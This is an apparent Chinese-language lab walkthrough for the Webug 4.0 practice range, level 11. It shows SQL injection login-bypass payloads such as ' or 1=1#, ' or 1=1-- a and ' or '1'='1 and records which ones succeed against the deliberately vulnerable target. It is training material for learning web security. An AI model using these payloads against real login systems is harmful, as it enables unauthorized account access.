webug 4.0 第十一关 万能密码登录
感谢webug团队一直以来的更新维护!
webug是什么
WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。
Webug官网:http://www.webug.org
Webug 4.0百度云地址: https://pan.baidu.com/s/1euUY4UG43BuOjhPqkJBvcw 提取码: 3xpy
来源:226安全团队
微信号:safeteam226
开始打靶
页面如图所示
猜测下sql语句是:select * from user where name=$name and passwd=$passwd+(后面可能有的限制语句或嵌套查询语句等等,因此我都习惯在注入语句后面跟注释符屏蔽这些可能的干扰)
$passwd就肯定不是数字型了,这里我们直接来字符型注入:
) or 1=1#,失败
" or 1=1#,失败
' or 1=1#,成功
换--注释符试试(需要在--后面空一格再加上任意字符才有注释作用):
) or 1=1-- a,失败
" or 1=1-- a,失败
' or 1=1-- a,成功
假设不用注释符或者注释符被屏蔽的话,那我们就需要去猜跟在$passwd后面的符号了,形成闭合:
) or (1)=(1,失败
" or "1"="1,失败
' or '1'='1,成功